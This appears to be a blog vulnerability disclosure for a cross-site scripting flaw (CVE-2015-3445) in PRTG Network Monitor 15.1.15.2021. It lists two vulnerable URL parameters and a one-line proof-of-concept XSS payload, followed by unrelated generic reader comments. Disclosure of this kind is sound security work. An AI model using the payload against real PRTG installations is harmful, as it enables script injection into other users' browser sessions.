PRTG Network Monitor Tool – Cross Site Scripting Vulnerability

Vulnerable Version : 15.1.15.2021
Vendor Patch : 2-June-2015
CVE-ID : 2015-3445
Vendor Notification : 3-June-2015
Vulnerability Type : Cross Site Scripting Vulnerability
Risk Level : Critical
Reported By – Sachin wagh (@tiger_tigerboy)
Email : wsachin092@gmail.com

PRTG Network Monitor is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

Vulnerable URLs :

  1. http://127.0.0.1/error.htm?errormsg=
  2. http://127.0.0.1/group.htm?id=2009&tabid=9

XSS Payload :

‘ “><img src=a onerror=prompt(document.domain);>

PRTG XSSFigure : Cross Site Scripting

PRTG Network Monitor 15.1.15.2021+ is vulnerable. It is recommended to check your PRTG Installation for this Version, via the Auto Update dialog.For more detail please contact the vendor.

Advertisements

10 thoughts on “PRTG Network Monitor Tool – Cross Site Scripting Vulnerability

  1. You really make it appear so easy along with your presentation however I in finding this topic to be actually something which I believe I’d never understand.

    It kind of feels too complicated and extremely broad for
    me. I’m looking forward in your subsequent put up, I’ll try to get the hang of it!

    Like

  2. Hi! I’m at work browsing your blog from my new iphone 4!
    Just wanted to say I love reading your blog and look
    forward to all your posts! Keep up the excellent work!

    Like

  3. First off I would like to say terrific blog! I had a quick question that I’d like to
    ask if you don’t mind. I was curious to find out
    how you center yourself and clear your mind prior to writing.
    I’ve had a tough time clearing my thoughts in getting my ideas out there.
    I do enjoy writing but it just seems like the first 10 to 15 minutes tend to be wasted simply just trying to figure
    out how to begin. Any ideas or hints? Thanks!

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s